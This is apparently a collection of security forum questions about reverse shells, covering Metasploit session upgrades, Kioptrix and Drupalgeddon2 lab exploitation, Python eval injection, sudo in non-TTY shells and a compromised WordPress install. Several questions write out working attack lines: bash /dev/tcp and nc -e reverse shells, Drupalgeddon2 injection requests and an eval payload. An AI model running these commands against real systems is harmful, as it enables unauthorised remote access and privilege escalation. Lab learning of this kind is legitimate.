Metasploit: Issue with upgrading a low privilege shell (sessions -u)

Setup info: I don’t believe this is the issue as I regularly update my system. I’ll add one piece of information as an example. If you would really like to the rest then I can add more in later

metasploit v5.0.89-dev

Payload: I used a custom python script to create a reverse shell from the victim’s computer to the attacker. No problem with the low priv shell in netcat or metasploit. If anyone wants to take a look at the script I can upload it to github and share the link(thought its nothing special, I’d prefer to send the link privately to keep the script as less spread as possible).

Exact Steps I took:

msf5 > use multi/handler msf5 exploit(multi/handler) > set payload windows/x64/shell_reverse_tcp payload => windows/x64/shell_reverse_tcp msf5 exploit(multi/handler) > set LPORT 549  LPORT => 443 msf5 exploit(multi/handler) > set LHOST 10.8.210.314 LHOST => 10.9.139.110 msf5 exploit(multi/handler) > run  [*] Started reverse TCP handler on 10.9.139.110:443  [*] Command shell session 1 opened (10.9.139.110:443 -> 10.9.0.1:50071) at 2020-05-30 22:31:25 -0400   Login: password You have a shell have fun #> background  Background session 1? [y/N]  y msf5 exploit(multi/handler) > sessions -u 1 [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]  

The Issue:

[*] Upgrading session ID: 1 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on 10.9.139.110:4433  [-] Post failed: NoMethodError undefined method `reverse!' for nil:NilClass [-] Call stack: [-]   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:136:in `shell_command_token_win32' [-]   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:84:in `shell_command_token' [-]   /usr/share/metasploit-framework/lib/msf/core/post/common.rb:147:in `cmd_exec' [-]   /usr/share/metasploit-framework/lib/msf/core/post/windows/powershell.rb:32:in `have_powershell?' [-]   /usr/share/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:161:in `run'  

Note: I have taken a look at some of the files, but they seem to be coded in ruby(something I am not familiar with) and the error seems to be related to multiple files, so I have no clue how to really debug this. There also seems to be similar issues posted on github if it helps.

Kioptrix 2: Why netcat reverse shell executed in web browser via command injection bug doesn’t work?

I’ve completed kioptrix level 2 challenge via bash reverse shell.

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

; bash -i >& /dev/tcp/10.10.13.37/4444 0>&1 

My question is why netcat reverse shell executed in web browser via command injection bug doesn’t work when it was working just fine via terminal?

My Setup

Kali -  10.10.13.37 Kioptrix 2 - 10.10.13.254 

netcat listerner

kali@kali:~$   nc -lp 4444 

I’ve verified tcp port 4444 is open

kali@kali:~$   ss -antp | g 4444 LISTEN 0      1            0.0.0.0:4444         0.0.0.0:*     users:(("nc",pid=3003,fd=3))  kali@kali:~$    

netcat reverse shell executed in web browser via command injection bug doesn’t work

; nc 10.10.13.37 4444 ; nc 10.10.13.37 4444 -e /bin/sh 

No traffic at all

kali@kali:~$   sudo tcpdump -nni eth0 port 4444 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 

However, when I repeat the same process with netcat executed on Kioptrix 2 terminal, I was able to get the reverse shell setup on Kali.

[backdoor@kioptrix ~]$   nc 10.10.13.37 4444 -e /bin/sh 

Reverse shell via terminal is working fine

kali@kali:~$   nc -lp 4444 id uid=502(backdoor) gid=502(backdoor) groups=0(root),10(wheel),500(john),501(harold),502(backdoor) 

tcpdump traffic, the last 4 packets were for id command

kali@kali:~$   sudo tcpdump -nni eth0 port 4444 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 00:58:29.307806 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [S], seq 1943169723, win 5840, options [mss 1460,sackOK,TS val 12217959 ecr 0,nop,wscale 2], length 0 00:58:29.307851 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [S.], seq 869624996, ack 1943169724, win 65160, options [mss 1460,sackOK,TS val 714133810 ecr 12217959,nop,wscale 7], length 0 00:58:29.308412 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 1, win 1460, options [nop,nop,TS val 12217960 ecr 714133810], length 0  00:59:55.154330 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [P.], seq 1:4, ack 1, win 510, options [nop,nop,TS val 714219657 ecr 12217960], length 3 00:59:55.157180 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 4, win 1460, options [nop,nop,TS val 12303857 ecr 714219657], length 0 00:59:55.159646 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [P.], seq 1:98, ack 4, win 1460, options [nop,nop,TS val 12303859 ecr 714219657], length 97 00:59:55.159656 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [.], ack 98, win 510, options [nop,nop,TS val 714219662 ecr 12303859], length 0 

HTTPS Reverse Shell: why and which features are essentials?

As an exercise I’m trying to write an HTTPS reverse shell on this assumption which I read elsewhere: ” HTTPS egress traffic would be monitored less”. Also HTTPS traffic would be encrypted. Anyway if a firewall just filter traffic on an IP address base it would be useless in my opinion or I’m wrong?

Which reasons should I have to use an HTTPS reverse shell instead of a TCP reverse shell? When it would bring some advantages ? Which features should the HTTPS reverse shell have?

Exectuting sudo command in one line within a non-tty shell

I have access to a server via RCE over http, I can send post requests to the server which results in command execution. I am attempting to escalate privileges via sudo (su is not installed).

The server is heavily firewalled and there are no writeable directories/files within the web application.

My objective is to experiment with the sudo command to escalate privileges but because the command execution is not TTY; I am unable to execute the sudo command.

Is it possible to execute a command like sudo -S in a non-TTY shell?

Maybe using python’s pty module to spawn /bin/bash or /bin/sh, but what about a method to just execute a single binary with some parameters passed to it like sudo -S <command> within/as a TTY shell?

To summarize: Is there a way to run sudo in a single line in a non-TTY shell?

For example I am trying to run sudo with these parameters:

echo <password> | sudo -S id

Can a PHP shell uploaded to a WordPress directory have access to an entire Linux machine?

I run a few WordPress instances. I had one new one that I had not configured and left sitting, so the installation was on the 1st step awaiting for the database name, username, password, and host. When I went to finish the install after letting it sit like that for a week, I had noticed that someone had found the site, and inputted their own database information, and “took the site over”. It was a blank slate, so not much to it.

I removed the wp-config.php file and re-ran the installation with my own values. I then looked around for anything suspicious in the WordPress directory. I had found a shell plugin they installed, labeled “UBH console”. I couldn’t get the console to run, I got a 404 error.

I assume this shell couldn’t get them access out into the machine past the www directory the website was installed in?

In the past, I’ve always set the WordPress directory permissions with the following command:

chown -R www-data:www-data directory/ 

Is this the right way to set these directories? Upon further research, a lot of people run this and stay like this, but I’ve heard to change your permissions after running the installation. Running Debian on my machine.

Sending a reverse shell command through the drupalgeddon vulnerability isn’t working

I’m trying to use the Drupalgeddon2 exploit (https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708) on drupal 7.57 ubuntu machine.

the requests:

-curl -k -s 'http://192.168.204.141/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=whoami' \ --data "form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail new Password" | grep form_build_id .  -curl -k -i "http://192.168.204.141/?q=file/ajax/name/%23value/$  {form_build_id}" \ --data "form_build_id=$  {form_build_id}". 

execute along with any other command (ls,cd…) and print a result.

but when I send the curl request:

curl -k -s 'http://192.168.204.141/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=nc-e/bin/sh 192.168.204.128 5555'--data "form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail new Password" | grep form_build_id . 

It doesn’t print anything (form_build_id) not even an error, and the target doesn’t connect to handler. where do you think is the problem?

I have tried other payloads, and they result in the same things.

Why reverse shell gives ambiguous redirect [closed]

I am exploiting python eval function. In target system code is like

eval('%s > 1' % My_Payload)

However, reverse shell is giving ambiguous redirect error. I am sending code like

"__import__('os').system('bash -i >& /dev/tcp/192.168.1.10/8081 0>&1')"

nc -lvnp 8081 listening on [any] 8081 ... connect to [192.168.1.10] from (UNKNOWN) [192.168.1.10] 43478 -bash: 1)#")}: ambiguous redirect

It seems to me that system does not have /dev/tcp, but I am not sure.

Any help appreciated.